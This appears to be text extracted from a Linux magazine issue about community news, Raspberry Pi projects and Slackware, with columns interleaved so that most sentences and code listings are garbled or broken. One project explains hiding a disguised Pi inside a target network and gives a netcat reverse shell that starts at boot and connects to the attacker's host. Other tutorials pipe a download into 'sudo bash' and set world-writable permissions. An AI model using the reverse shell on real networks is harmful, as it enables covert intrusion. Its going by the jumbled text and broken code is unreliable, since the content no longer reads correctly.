Aberdeen to Manchester, London to Kirstin Leath, of NHS Hack
Norway and attracting 92,000 page Scotland, said: “Open Tech Calendar
views. is fantastic! It makes organising,
The site lets anyone sign up advertising and finding tech events
to add or edit events using the so easy. ”
same model as Wikipedia, and Al Bennet from Edinburgh
thus relies on people adding Hacklab said “Open Tech Calendar
events themselves. So far over is a great way to find tech events
360 people have signed up. Open in Edinburgh. We’ve found many
Tech Calendar has embraced the interesting events to attend through
principle of open data, allowing it. We switched to putting Hacklab
anyone to use the events data they events on OTC earlier this year
have collected and providing open rather than on a shared Google
APIs to make this possible. Calendar, as OTC allows any of us The Peartree pub in
In January this year the engine to put an event online in our group. using the OTC WordPress widget on Edinburgh’s wonderful
behind the site was made available This has made it much easier to our site, so all our events appear on beer garden will play
to other communities to use. This manage rather than having only a our site with no effort.” host to Open Tech
Calendar’s birthday
is offered through a platform at few people managing the Google The birthday will be celebrated in
celebrations, on Calendar. The wiki-style editing of the Pear Tree to which the local tech
Thursday 24 July.
and made available as an open OTC really helps as it’s easy to throw community is invited:
source product at http://ican. an event on when we’re early in the This has been planning and then others can easily event/1457-open-tech-calendars-
used by: refine the listing later on when we 2nd-birthday
Edinburgh Council for Edinburgh have more information to add. We’re
Bristol and Bath LUG
Bristol’s more than just cider and bridges, claims Ben Everard.
he Bristol and Bath LUG engineering, it’s now a digital
meet at the Knights Templar powerhouse. A recent McKinsey
pub next to Temple Meads report singled out Bristol and Bath
railway station on the last Saturday as a globally significant technology
of the month. Both pub and station cluster because of the network of
are named after an oval Knights tech companies working there.
Templar church that once stood It’s hardly surprising, then, that
nearby. The church was destroyed the region has produced a thriving
after the order was suppressed in Linux community. The Bristol
1312, and a rectangular church was and Bath Linux User Group has
built where it once stood. Much of links with the Bristol Hackspace,
this later church remains, but it was and brings together a diverse
put out of use by a German bomb crowd of geeks. We joined them
during the Second World War. for their June meet up where we
Bristol, though, is more famous discussed BeagleBones, Raspberry
for its technology than its religion. Pis, Arduinos, old-fashioned
Previously the home of Isambard programming and the advantages If you’re in the south west of England and fancy joining some
Kingdom Brunel and the location and disadvantages of cover other Linux users for a few drinks and a natter, you’ll find all their
for some of the greatest Victorian mounted DVDs. details at 17
he Raspberry Pi has been a breath of fresh which shows one of the woderful thigs about
air for tinkerers, teachers and anyone Linux: that it’s scalable and flexible.
interested in finding out how computers But there’s something magical about the Pi that
really work. makes it feel like a diferent proposition to a
On the one hand, it’s just a Linux box. There’s standard Dell box. There’s a spirit of adventure to it,
nothing you can do on a Raspberry Pi that you a sense that you can have a go and do anything –
can’t do with any other Linux machine, so there’s and that’s what we want to capture over these
nothing special about any of the projects here eight pages. So without further ado, we want you
– you can follow the same set of instructions on to get stuck into these eight projects. Carry on –
your x86 box and get exactly the same result, and let us know what amazing things you build!
International Space Station detector
Get a warm fuzzy glow from your Linux box whenever the ISS is near.
or our first project we’re going to turn As we’re dealing with orbital data that’s through a third-party web API. This means
our Raspberry Pi (or any other Linux constantly changing, as well as very complex we don’t have to make any calculations
device) into an ISS detector by writing astronomical calculations, creating an ISS ourselves, or worry about any orbital
a very basic Python script. When it senses detector might initially seem challenging. But mechanics. The API call simply returns the
that the space station is close, it creates a this isn’t as difficult as it first seems. Despite latitude and longitude of the ISS’s current
signal of some kind. We’ll start out with text the task requiring some serious position. In the Python code that follows,
output, but this can be augmented in any mathematical knowledge, we can wield the this is parsed using JSON, a widely used
way you choose. format for sharing data that’s
There are more output options for
the Raspberry Pi than we could list, “We can wield the power of open perfect for interoperability.
We’ve called the third function
but at its simplest you could light a source and the internet to build on in our script sph_dist and it was
single LED, or pulse a couple of LEDs
depending on distance. It’s an idea solutions created by other people.” originally written by John Cook.
Using Python’s math module, this
that’s been around for a while.There calculates the distance between
was a Gnome panel applet, for example, power of open source and the internet to two points on a sphere, taking the two sets
that performed a similar task, and earlier build on solutions created by other people. of latitude and longitude as its input. This is
this year a Kickstarter project turned a You’ll find the code below, but before copying exactly what we need, because the ISS-
Raspberry Pi into an ISS beacon. Sadly, the and pasting into your favourite text editor, locating function returns compatible values,
code for this project is unlikely to be released we’ll explain what it’s doing. and it’s easy to define your own location by
in its entirety, so we’re going to have to come The first chunk of code comes from Alex searching for the latitude and longitude. The
up with our own solution. Bartis, and it accesses ISS location data final ‘arc’ value needs to be multiplied by the
radius of the Earth in your chosen unit. Our World”, but it’s perfectly suited to our needs
unit is miles, so we multiply the answer by and can easily be expanded. A single LED
3,960, but if you want kilometres, multiply circuit needs nothing more the an LED itself,
this by 6,373 instead. This function is a 270Ω resistor (this is important) and a
assuming the Earth is completely spherical couple of wires. The circuit connects one of
– there is a 0.3% difference between the GPIO pins on the Raspberry Pi through
equatorial and polar diameters, but we’re the long leg of the LED, as this is the positive
happy to live with this error. side, with the resistor going between the
short leg of the LED and the GND, or 0V, pin
Follow the space station back on the Raspberry Pi. Our Python script
All the script then does is output the location will then send a message to the GPIO pin
of the ISS followed by the distance from the that will send 3.3 volts through the circuit, The International Space Station yesterday.
location entered into the home location at lighting the LED. As the whole point of this
the top. We could have automated that part, project is to light the LED when the ISS is in
but it would add to the complexity and the relatively close proximity, we’ll use the connected our LED to:
amount of code we’d have to print – and distance value to check whether the ISS is GPIO.setmode(GPIO.BOARD)
anyway, it’s a challenge for anyone who less than 200 miles away. GPIO.setup(12, GPIO.OUT)
wants to add their own mark to the script. To bring GPIO functionality into Python, Now all we need to do is add the distance
When you’ve added the following to a text add the RPi.GPIO module to the top of the check, which we’re going to add to the above
file, it can be executed by typing python script – we do this ‘as GPIO’ so we don’t have script immediately after the distance =
followed by the script’s filename. to refer to the entire module name through sph_dist call and before printCoordinates.
import urllib, json, threading, math our code. Here’s what ours looks like: All this code is doing is sending a positive
url= “” import urllib, json, threading, math, RPi.GPIO as value to the GPIO pin if the distance is less
home_lat = 51.4353 GPIO than 400, and sending a negative value if the
home_long = 2.0043 Below this we need to initialise our GPIO distance is greater. We chose 400 because
def work(home_lat, home_long): connection, and this is where we need this should mean the ISS is visible around
response = urllib.urlopen(url) to define which pin we’re using. GPIO pin 40 degrees above the horizon.
data = json.loads( numbers don’t always correspond exactly to if distance < 400:
iss_lat = data[‘latitude’] those on the board, because the Raspberry GPIO.output(12,True)
iss_long = data[‘longitude’] Pi doesn’t reveal all potential outputs, and else:
distance = sph_dist(home_lat, home_long, iss_ that GPIO numbering is often derived from GPIO.output(12,False)
lat, iss_long) the pin numbers on the microcontroller All that’s left now is to save the script and
printCoordinates(distance, home_lat, home_ rather than the pins present on the circuit run it. For space, our script is pretty crude,
long, iss_lat, iss_long) board. but it does work. It should really have a more
threading.Timer(30, work(home_lat, home_ This problem is solved by setting the GPIO graceful way of quitting other than Ctrl+C, as
long)).start() mode to the pins, rather than of the chip, we should execute GPIO.cleanup() to close
def printCoordinates(distance, home_lat, home_long, and we follow this command by initialising our connection to the GPIO pins, but this
iss_lat, iss_long): pin 12 – which is the pin we’ve wired and should be pretty easy to add.
print “The International Space Station’s current
coordinates are “
Viewing the ISS
print “Latitude =”,iss_lat,” “,”Longitude =”,iss_
long A few local conditions need to be satisfied if
print “Current distance to the ISS: “,distance you want to see the International Space Station
def sph_dist(lat1, long1, lat2, long2): from your location. Firstly, it may be obvious,
degrees_to_radians = math.pi/180.0 but all satellites are only lit by the sun. That
means that in the dead of night, they’re probably
phi1 = (90.0 - lat1)*degrees_to_radians
veiled within the Earth’s shadow just like us.
phi2 = (90.0 - lat2)*degrees_to_radians They need to be lit by the sun to be visible.
theta1 = long1*degrees_to_radians But as the observer needs to be in the dark,
theta2 = long2*degrees_to_radians viewing time has to be within a time envelope
cos = (math.sin(phi1)*math.sin(phi2)*math. either directly after the sun has gone down, or
when it’s about to come up, so that the space
cos(theta1 - theta2) + math.cos(phi1)*math.c$
above you is effectively lit by the sun while the
arc = math.acos( cos ) ground is not. The duration of this envelope is
return arc * 3960 dependent on your location and the time of the
work (home_lat, home_long) year, but it’s usually a couple of hours. Thanks
We left any Raspberry Pi-specific code out to its large solar panels, the ISS is usually
impossible to miss if you get the time right. It
until now, so it could be used in as many can often be the brightest object in the sky and
places as possible, but now we’re going to will normally take several minutes to progress
add a new function that will simply light an from one side of the sky to the other. It’s a Use one of the real-time trackers online to test
LED. This is probably the simplest circuit you wonderful object to look out for. your own Raspberry Pi ISS detector
can build – the hardware equivalent to “Hello 19
Voice Operated Pi
Open the pod bay doors, HAL.
e’ve wanted to write something
about Linux voice recognition
since we began the magazine,
simply to cause search engines even more
confusion when people search for ‘linux
voice’, and this excellent project has given us
the perfect excuse. Jasper is an ambitious
plan to control everything with your voice, in
a similar way that you can through Android
and iOS – except that Jasper is open source
and easily extensible. By default, it will check
your email, send you text messages and tell
you the weather, but it can be easily added
to. And as it works best with a machine
that’s always on and always listening, the
Raspberry Pi makes the perfect platform.
You’ll need some speakers or headphones
connected to your Pi to hear Jasper’s output,
and as the Pi has no microphone input, the
only other requirement is for a USB
microphone of your own. These can be You’ll need a microphone for the voice recognition to work, and we’d recommend checking the
bought cheaply, but we did have trouble compatibility list at
finding one that worked without further
configuration. The project itself When your Pi comes back online, connect the boot procedure again by typing python
recommends the Kinobo USB 2.0 ‘Akiro’ again and execute the following: ~/jasper/boot/ and restarting. You
microphone, which costs around $25, but cd ~/jasper/client may also want to make sure your mic is
we ended up with a generic model costing python recording and playback is working. You can
less than $10. The easiest installation You’ll be asked for your name and then do this by first making a recording and then
method is to grab the Jasper card image you’ll be asked for your Gmail address, playing it back with the following:
from and which is used to send you notifications. Your arecord -Dhw:0 -r 44100 -c 2 -f S16_LE test.wav
transfer this to your SD card using your password is going to be stored in plain text, aplay -Dhw:1 -r 44100 -c 2 -f S16_LE test.wav
preferred method before booting off this and you may not want to trust the packages If either of these commands don’t work,
with your Pi. You then need to connect to you’ve just installed. You’ll also be asked for you’ll need to manually configure .asoundrc
your Pi over SSH using the default your mobile number for notifications, the using the output from aplay -L and arecord
credentials of pi as the username and name of your nearest large town (for -L to specify the exact device names for
your speakers and microphone.
“With a bit of luck you should hear the sounds of However, most configurations will just
work. It’s only when the USB device of the
a speech synthesizer saying ‘Hello, I am Jasper.’” microphone messes around with ALSA that
trouble starts to creep in. With everything
raspberry as the password. weather reports) and a timezone. For us, running, you can now start issuing
Download the latest version of Jasper, that’s ‘Europe/London’. You’re then asked commands to your new Raspberry Pi
then grab and configure some essential whether you want messages by email or overlord. Start by saying ‘Jasper’. Your Pi will
Python tools with the following commands: text. You can change these settings later by output a high-pitched beep. Now say “What’s
git clone editing a configuration file. You should then the time?” When a command has been
jasper-client.git jasper restart your Pi once more. recognised, your Pi will issue a low beep
sudo pip install --upgrade setuptools With a bit of luck, a few minutes later you before speaking the answer. Other questions
sudo pip install -r jasper/client/requirements.txt should hear the sounds of a speech you can ask include “What’s on Hacker
The boot script needs to be added to a sythesizer saying “Hello, I am Jasper. Please News”, “Do I have any email?” and “What’s
crontab, which you can do by typing crontab wait one moment.” It then takes another the weather like tomorrow?” If you want to
-e and adding @reboot /home/pi/jasper/ minute or two before everything else is read take this further, you can play with the
boot/; to its own line, then fix any and you’ll get another prompt. If this doesn’t configuration files to add Spotify playback
broken permissions with sudo chmod 777 happen – and it didn’t for us – re-connect to integration as well as Gmail and Facebook
-R * before rebooting your Pi with sudo your Pi and kill all Python processes (killall support, and it’s quite straightforward to add
shutdown -r now. python). Our problem was solved by running your own commands.
Run your own OwnCloud
An easy-to-install Dropbox clone where you control all the data.
toring things in the cloud is
convenient. All your data is available
from one place, and it can be
accessed by multiple devices. But data in
the cloud is out of your control, and that has
lots of implications for privacy and security.
It’s far better, we think, to stay in control of
your own data and services, but until
relatively recently, there wasn’t an option
anywhere near as powerful as Google,
Microsoft or Apple.
This is where OwnCloud steps in. It’s an
open source project that offers many of the
same features as Apple or Google’s cloud
offerings, only it runs on your own hardware.
Hardware like your Linux box or humble
Raspberry Pi, which is particularly well
suited as it doesn’t suck too much power.
You will need plenty of storage, however, so
If you’re setting up OwnCloud, your Raspberry Pi will need a static IP address and you’ll need to
we’d recommend the use of an external USB
forward web requests to this from your firewall/router.
drive (see box on Network Attached Storage,
below). OwnCloud itself runs on Apache and
PHP, which can be installed with the server with sudo mv owncloud /var/www address of your Pi followed by ‘owncloud’:
following commands: before making sure the new files have the for
sudo apt-get install apache2 php5 php5-gd correct permissions for their new location: example. The landing page should open and
php-xml-parser php5-intl php5-sqlite php5-mysql sudo chown -R www-data:www-data /var/ ask you to create an admin account.
smbclient curl libcurl3 php5-curl www/. To give OwnCloud full control of its Using OwnCloud is straightforward. When
You can then install OwnCloud directly own directory, we need to enable ‘htaccess’ you first connect you’ll be reminded of the
from its own archive. Go to, override files in Apache. To do this, open desktop and Android clients that can
click on ‘Install’ and choose the option for /etc/apache2/sites-enabled/000-default automatically sync your OwnCloud folder
your own server. Grab the Unix file (tar.bz2) with your favourite text editor and modify with those devices, and we’d recommend
and download it to your Pi. Unfold the the AllowOverride option to say All rather using them. But from within the web
archive from the command line with tar xvf than None in the /var/www folder interface, you can still drag and drop files
owncloud.tar.bz2 – this takes a surprising (OwnCloud will give you a security warning if and folders, create shared links and add
amount of time on your Pi – and move the you don’t get this correct). Now all that’s left users and plugins from the admin page – all
resulting folder into the root of your Apache to do is open a browser and point it at the IP while staying in control of your data.
Network Attached Storage Add some much needed external storage and share your files across the network.
With OwnCloud running on your Pi, you don’t UUID=”4c002899” /media/nas ext4 defaults 0 2 workgroup, if you have one, and add the
particularly need a network attached storage This will ensure that our drive is always mounted following to create a shared folder on your
solution, as OwnCloud and its clients will perform at the same place with a more human-readable external USB storage:
most functions without any extra effort. However, if name. You can mount this by typing mount /media/ [pi]
you want to stream films and music, you’ll find that nas or restarting your Pi. Move the /var/www/ comment= Raspberry Pi
it gives you much better performance. But before owncloud folder to your external storage and path=/media/nas
we install and configure this, we need to solve the update the ownership to www-data as we did in the browseable=Yes
problem of additional storage. This can be done by OwnCloud section above. Now make a symbolic link writeable=Yes
connecting a USB drive, but to make your storage between the new location and the old – ln -s / only guest=no
area part of the overall filesystem – so that it can media/nas/owncloud /var/www/owncloud and create mask=0777
be shared across the network or used by OwnCloud everything should work. directory mask=0777
– requires a couple of extra steps. To create a Samba share, create a folder on your public=no
Connect your pre-formatted ext4 USB drive. It storage device and make sure it belongs to user ‘pi’. Finally, create a Samba password for your username
should be automatically mounted to a UUID-named Then install samba and samba-common-bin. Type with smbpasswd -a pi. You can now add, remove
folder under /media. Create a nas folder in /media sudo nano /etc/samba/smb.conf to open Samba’s and edit files on your share remotely by using the
and add the following line to /etc/fstab, replacing configuration file with the Nano editor. Change the smb://pi@pi_address URI where you’ll be asked to
the UUID with that of your device: WORKGROUP name to the name of our local enter your password before being granted access. 21
Scratch and GPIO
Use the graphical language to interact with the real world.
cratch is a graphical programming
language. This means that rather
than type in code, you drag and drop
colourful blocks of code into place. It is a bit
limited by the range of code blocks available,
but it’s great for getting kids interested in
code. It runs on Linux, Mac and Windows,
and there’s a web-based version as well (at
There’s been a recent surge in interest
because it’s been adopted by the Raspberry
Pi foundation (along with Python) as a
way of unlocking the power of the Pi. It’s The first circuit simple switches the output on,
also likely to be used by many teachers in waits one second, then switches it off, then
England and Wales come the start of the waits one second and repeats.
new computing curriculum this September,
as it provides a useful bridge between desktop. Scratch GPIO 5 (without the plus electricity flows. The diagrams above and
speudo-code and ‘real’ programming. at the end) is the one we’ll use. The Scratch below show the two different programs and
To make this work even better, there is a GPIO 5 Plus program can be used together how to wire them up.
modified version of Scratch that enables you with some expansion boards (such as LEDs have to be connected the correct
to use the additional hardware connected Pimoroni’s Pibrella), but we’re going to go way around. There should be a flat edge on
through the GPIO ports. back to basics and build our own circuits. the circular base. This marks the negative
To get started controlling hardware with leg. All the other components will work either
Scratch, download this modified version and Blinkenlights way around.
install it by typing the following commands We’ll create two programs: one that just There are a few different ways to number
into LXTerminal: switches an LED on and off, and one that the pins on the Pi, so it’s important to make
sudo wget -O takes two buttons as inputs and uses them sure you are connecting the wires to the
sudo bash to turn the switches on and off. In order to correct pins. If you hold the Pi with the
This will install two new versions of make the circuits work properly, we’ll also SD card at the top, the top-left pin will be
Scratch and put icons for them on your need some resistors to control the way the number 1, the top right pin is 2. The second
row down is pins 3 and 4, than 5 and 6, and
so on.
“There’s been a surge in interest in Scratch, because There’s more information on how to use
it’s been adopted by the Raspberry Pi Foundation.” Scratch with the GPIOs at http://cymplecy.
You could use the button circuits from this project in other programs to take input from the user.
Security camera
Build a motion-activated camera and keep your buildings secure.
he Raspberry Pi with a camera The inet addr is what we need (in this
board is one of the cheapest ways of case From another computer
building your own networked on the same network, you should be able to
camera system. What’s more, because the open up a web browser and enter this in the
Pi is fully programmable, it’s one of the most URL bar. You should see a page something
versatile ways of streaming live video. like the image on the right.
To do this, you’ll need one of the official On this page, you can adjust all the
Raspberry Pi camera modules. There are different attributes of the camera, record
two versions available: the normal one, and videos and take pictures (the results of
the NOIR version. The NOIR version doesn’t which are available if you click on the
have an infrared sensor, so it captures Download Videos and Images link – don’t
pictures better in low light conditions. Either worry if the preview doesn’t work, you can
will work fine. still download the files). What’s more, you
Once you’ve installed your camera module can start motion detection. When this is
(full instructions are at www.raspberrypi. on, it will monitor the image for moving
org/help/camera-module-setup), you need objects, and when it finds some, it’ll record a
to get the software for streaming the video video. This is perfect for a security camera
over the network. Open up LXTerminal on because it means you can save footage of
your Pi and enter the following commands: things happening, but not waste disk space
git clone with endless hours of nothing going on.
cd RPi_Cam_Web_Interface Too much data
chmod u+x The standard resolution video sends quite Without the infra-red filter, the colour is a little
./ install a lot of data, which can cause problems for off on the NOIR camera module, but it works
The final command may take a little while the Pi. We found that the motion detection much better in low-light.
to run, but once it has, restart your Pi. It’ll worked better at a lower resolution and
automatically start streaming, so all you frame rate. This should be OK for a security are as follows:
need to do is find out the IP address so camera as high definition isn’t essential. video_width 600
that you can get the stream from another Another option would be to overclock your
computer. Open up LXTerminal and enter: Pi, but this would draw more power, and video_height 500
ifconfig since it’ll be running constantly, it could
In the output, look for the block labelled cause it to overheat if it’s in an enclosed video_fps 10
eth0 (if you’re using a wired lan) or wlan0 space. Moderate overclocking probably motion_detection true
(if you’re using a Wi-Fi network). In it, there won’t be a problem, but you have been The final line (it’s also the last line of
should be a line that’s something like: warned! Large video resolutions also lead to the config file) will start motion detection
inet addr: Bcast: large file sizes. What you’re willing to use will automatically. Just restart your Pi and all
Mask: depend on the amount of storage you have these changes will take effect.
available, and how often you want to clear it There are loads more things you can do
out. We opted for a width of 600, a height of with this software. Take a look at
Keep yourself safe online 500 and a frame rate of 10 for video.
All this is quite useful, but each time for more information and inspiration.
Tor is a way of staying anonymous online.
We’ve covered it in detail in the Tutorials the Pi restarts, it resets all these settings.
section of this issue, so take a look there if Ideally, we want a way of saving the default
you haven’t heard of it before. You can use a settings, and having these run whenever
Raspberry Pi to create a wireless access point the Pi is switched on. Fortunately, there is a
that pushes all of your internet traffic onto Tor.
config file that does just this.
Adafruit has created a starter kit with
everything you need to do this – but all you The config file is /etc/raspimjpeg. You
really need is an SD card and wireless adaptor, can open it by entering the following in
so if you have these already, there’s no need LXTerminal:
to purchase it. You can still follow the Adafruit sudo leafpad /etc/raspimjpeg
instructions to set everything up (https://learn.
You can change this depending on how
It may take a little time to run though you want your setup to work – the best
everything, but you’ll learn a bit about how Linux option is to test out different settings using
handles routing and networking along the way. the web page, then enter them into here
when you’re happy. The lines we changed 23
A little computer is an essential part of a penetration tester’s toolbox.
he Raspberry Pi is small enough to
fit inside other devices, yet also
powerful enough to be used as a
general-purpose hacking device. This means
it’s an excellent choice for hiding inside
someone else’s network. This is the sort of
operation that Hollywood loves. In films,
hackers are often shown turning up at some
location disguised as a maintenance crew,
sneaking some piece of hardware in, and
then compromising the computer system.
We’ll show you how to do just this with a
Raspberry Pi and a bit of ingenuity.
The first thing you need is some housing
for the Pi that no-one would suspect. In
order for it to work, it’ll need a power supply
and a network cable. This could mean
disguising it as a security camera, a network
printer, or a router. There really are lots of Kali has the Xfce desktop rather than LXDE, which is the default on Raspbian. Now that there’s a
options here. version for the Raspberry Pi, penetration testers are in for some fun.
The second thing you’ll need is some
software. Raspbian is a great general- from the machine that the Pi connects to in /root/autoconnect with the contents:
purpose OS, but it lacks some of the the opposite way to an SSH session. #!/bin/bash
software that’s useful when you’re trying To do this in the hacking scenario, you’ll
to break into a network. Kali is a Linux need a machine with a public IP address while true
distribution that’s designed specifically (such as a VPS or a web server), but for do
for penetration testers (ethical hackers), testing, you could just use another machine nc -e /bin/bash
and has a version for the Raspberry Pi. on the same network. To set up the reverse done
Download it from www.offensive-security. shell, you first need to set the main machine and make it executable with:
com/kali-linux-vmware-arm-image- (ie not the Raspberry Pi) to listen. You can chmod a+x /root/autoconnect
download, and then transfer it onto an SD do this with the command: Then create a script to run it at boot. This
card using the dd command. nc -l 1234 will be the file /etc/rc3.d/Zautoconnect, and
This will listen on port 1234 (you could it should contain:
Reverse shell use port 80 to avoid suspicion if you’re not #!/bin/bash
When you boot up into Kali, you’ll get to running a web server). On the Pi, you can /root/autoconnect &
a login screen. The credentials are root / then enter: Voilà! You now have a machine that, when
toor. Once you’re logged in, the command nc -e /bin/bash 1234 plugged into a network, will automatically
startxfce4 will begin a graphical session. This will connect to the IP address connect back to your computer and allow
It’s often possible to plug any device into (you will need to change this). you to control it, giving you access to an
an organisation’s network and access the On the main machine, you can now enter internal network from outside. By making
internet, and that’s what we’ll try and do commands that will run on the Pi. an outward TCP connection, it should allow
with our hacking box. However, we need a you to get through many (though not all)
way of controlling it. You won’t be able to Start on boot firewalls. It’s also armed to the teeth with
SSH into it because it’ll be behind a NAT and Of course, this won’t work in our hacking penetration testing software to allow you to
firewall. However, it’s often much easier to scenario because we won’t be able to get scan and attack the network it’s in.
make a connection out of a network than to the Pi to enter the command to start This is a great tool for penetration testers,
it is to make a connection in. We’ll set our the reverse shell. We need to set it to run and should be used only in that way – to find
Raspberry Pi up to connect outwards to our automatically, and reconnect if there’s a security weaknesses with the permission
main machine and create a reverse shell. problem. We can do this by creating a script of the people who own the network you’re
That means that we’ll be able control the Pi and running it at boot. First create the file attacking. Using it maliciously is illegal and
many countries have severe penalties for
hacking. What’s more, the above script has
“We’ll set our Raspberry Pi up to connect outwards your IP address in it, so it won’t take them
to the main machine and create a reverse shell.” long to find you when they discover the
device. Use it responsibly!
Only the Pi version of Minecraft lets you script your world.
or many of you, Minecraft will need
no introduction. It’s one of the most
popular games of the past few years
and has transformed its creator from an
indie game developer into a superstar. In the
game, your character inhabits a blocky 3D
world that they can mine for the
components they need to craft new items
(hence the name).
There’s a special version for the Raspberry
Pi that’s available for free from pi.minecraft.
net, and it’s a little different from most
versions. First, there aren’t any nasty
creatures that come in the night and try
to kill you. Second, it has a programmable
API that isn’t available on most versions.
This means that you can write code that All power corrupts and absolute power corrupts absolutely – revel in your absolute power/
dives into the internals of the game and corruption in the safe world of Minecraft, as seen here in its Raspberry Pi incarnation.
manipulates the 3D world. You can teleport
the player, and even change the blocks from The minecraft module contains all you list of them at http://minecraft.gamepedia.
one type to another. need to connect to the world. Enter the com/Blocks, though not all of these are
Once you’ve downloaded the tar.gz file following into the Python session: available in the Pi version). There’s no official
from the above site, unzip it with: >>> import minecraft documentation for the API, but the code is
tar zxvf minecraft-pi-0.1.1.tar.gz >>> mc = minecraft.Minecraft.create() commented, so the best way of finding out
You can then start a new game with: all the available methods is to look inside
mcpi/minecraft-pi King of the world! the file. Almost all of them
This will let you create a world and play the The mc object can now be used to revolve around getting a particular attribute
game as normal (albeit a little stripped down manipulate the world; for example, the or setting it.
from the main PC version). However, once following command moves the player to the We’ll leave it up to you to decide what to
you start playing, you can open up a new coordinates 10,10,10: do with this power, but a few suggestions
LXTerminal window, and start playing God. >>> mc.player.setPos(10,10,10) are: build mansions, mazes, or re-create
You need to navigate to the folder To set a particular block location to a things from the real world; use one of the
containing the api module, then start a particular block type, use: Python GPIO modules to interface Minecraft
Python interactive session: >>> mc.setBlock(x,y,z,block_type) with the real world; or build 3D games using
cd /home/pi/mcpi/api/python Where x,y and z are the coordinates and Minecraft as a rendering engine. With the
python block type is the numerical type ID (there’s a Raspberry Pi, the world’s your oyster.
The chip at the heart of the Raspberry Pi – the BCM2835 – was designed for
embedded multimedia devices such as set-top boxes. This means it’s got quite a
powerful graphics processor and can handle high-def video playback. In other
words, the Raspberry Pi makes a great base for building your own media player.
XBMC is, in our opinion, the best home theatre software for Linux, and one
group of enthusiasts have built a distro specifically designed for running XBMC
on the Pi: Raspbmc. At the time of writing, a new version of Rasbmc is in
development. It has spread beyond the Raspberry Pi to other platforms (the
Cubox-i and Apple TV have been named), and so it’s been renamed the Open
Source Media Centre (OSMC).
The easiest way of installing Raspbmc is via the Noobs OS installer (www., though it’s also possible to install it via a
shell script from a Linux computer other than the Raspberry Pi (www.raspbmc.
com/wiki/user/os-x-linux-installation). XBMC will give you an interface for
watching your movies, or listening to music on your Pi. You can even connect it
to another computer running TVHeadend to watch or record live TV. The real
advantage of XBMC over other media players (such as VLC) is the interface that’s You can even use a smartphone as a remote control for XBMC
designed for a home theatre rather than a PC. ( 25
Forget your Ubuntus and Fedoras – true
Linux Nirvana comes from following the way
of Slackware, according to Andrew Conway.
ack in the day, before there were friendly GUI these ways and give you a rock-solid, modern
installers; before pretty became a feature, and operating system that’s under your full control.
before a Linux-based OS conquered the world The simplicity of Slackware is in how it operates,
through the magic of smartphones, there were only a the way packages are handled and how key parts of it
handful of Linux distros. Most of them have fallen by are written and configured using text files. When it is
the wayside over the years – who remembers set up, it can be as easy to use as any other distro
Yggdrasil, Caldera or Linspire? with a full-fat desktop like KDE, or as leet as you like
There is one survivor from those days though, and with a simple tiling window manager.
you can try it today: Slackware. Slackware is simple. If you’ve played around with other Linux distros or a
By that, do we mean that it’s is easy to install, set up BSD variant and found yourself intrigued on the
and use? If you charge in armed only with enthusiasm, command line, then you shouldn’t find Slackware too
then the answer is probably no. But if you have some challenging. With Slackware, it really pays dividends to
experience with Linux, are prepared to read the spend time with the READMEs before embarking on a
documentation and invest enough time in serious endeavour such as installing it. As with many
understanding it, then Slackware can be easy in all of OSes, a good way to start experimenting with
Slackware is to install it in a virtual machine using
software such as VirtualBox or Qemu.
A great resource for Slackware is docs.Slackware.
com. At the top of the main page you’ll see a link to
“Slackware installation” – read that page and you’ll get
a detailed and clear description of how to install it.
We’re not going into installation details here, but a
crucial point to remember is that it’s recommended
that you do a full installation. This may seem irksome,
especially if you’re used to starting with a minimal
package set and just adding in what you need, but
there’s a good reason for it, which we’ll come to later.
Besides, only 8 GB is required, which even for a
five-year-old computer is probably a fraction of your
available hard drive space.
The mythical Slackware package manager importantly, most of the libraries you’ll need will be Slackware may be over 20
There’s a myth that Slackware has no package installed. So, if you install package ‘foo’, it’s likely that a years old, but that doesn’t
mean users are stuck
manager. Like all myths it has some basis in fact, in dependency, say, library ‘lib-bar’, is present already.
in the past – here it is
that Slackware doesn’t come with a GUI package Contrast this with Arch, say, where the initial minimal running KDE 4 and a bunch
manager nor one that automatically handles install is likely not to contain ‘lib-bar’ and Pacman will of modern applications.
dependencies, though unofficial tools such as have to pull in ‘lib-bar’ and all of its dependencies too.
slapt-get do exist. That’s no criticism of Arch – in fact Arch is often a
If you are used to Yum, Pacman, apt-get, or loyal Slacker’s second distro choice because it offers a
Ubuntu’s GUI tools, we can’t blame you for finding this different kind of simplicity, one that starts from
off-putting, but there is a reason behind it. In fact, minimalism.
Slackware users actually grow to appreciate the I’ve been using Slackware for nearly 20 years for all
advantages of handling dependencies manually. And kinds of things (scientific computing, audio, software
no, it’s not a form of spiritually cleansing masochism: development, gaming) and only once did I have a
Slackware users do not wear horsehair shirts, nor do problem with a package having so many
they birch themselves at daybreak. The reason behind dependencies that it put me off an installation
the lack of automated dependency checking is – (Pandoc’s dependency on Haskell was the culprit). It’s
guess what? – simplicity. Let us explain. not uncommon that there are no dependencies to
Slackware is designed so that with a full installation install, and when there are it’s often just one or two. To
you will be provided with tools to address most tasks illustrate the point, these are a few of the packages I
you’d expect from a modern OS, but even more have installed that are not included in Slackware 14.1:
LibreOffice, Steam, Audacity, VirtualBox, TeamViewer,
OwnCloud desktop client and NetBeans. Together they
only required three
packages to be installed
as dependencies
“Slackware users do not wear
(including horsehair shirts, nor do they
dependencies of
birch themelves at daybreak.”
If you accept that
manual dependency resolution in Slackware isn’t as
big an overhead as you’d expect, then you can start to
appreciate the advantage it brings: understanding your
system. Here’s an example. Recently I got a Dell XPS
13 with Ubuntu 12.04 LTS pre-installed and I grew to
like it in many ways in the six months I used it. But, on
one horrible morning when I had some urgent work to
do, it refused to boot. I ruled out a hardware problem,
and after poking around on the recovery console, I
guessed that some package I recently installed had
trashed the X display drivers. Reinstalling the Ubuntu-
desktop package and the X drivers seemed to fix it,
Tux the penguin is depicted here with J. R. “Bob” Dobbs, but many hours were lost. I never really understood
founder and prophet of the Church of SubGenius. what caused the problem – my best guess was that it
It’s a bit like how a Jedi uses The Force. was either a dependency of Steam or a 3D 27
Or perhaps you’ve found a file such as /usr/bin/
scareyvirustrojon.nasty and wonder where it’s from –
this will tell you:
grep nastyvirus /var/log/packages/*
and hopefully jog your memory into realising it’s part
of that Humble Bundle game you installed a while ago.
Updated Slackware packages come out soon after
upstream maintainers release a security fix. For
example, when I read about the infamous Heartbleed
bug in a tech news RSS feed, I found there was already
an updated package from Patrick Volkerding. When an
updated package is released, it’s simple enough to
download the new tarball and install it with
upgradepkg foo. However, if a number of updated
packages arrive at the same time, it’s much simpler to
use the slackpkg tool instead, which looks much like a
command line package manager from other distros, ie:
sbopkg is an efficient
visualisation package that I had recently installed slackpkg update
Curses-based tool for
browsing and working using the Software Centre. slackpkg upgrade-all
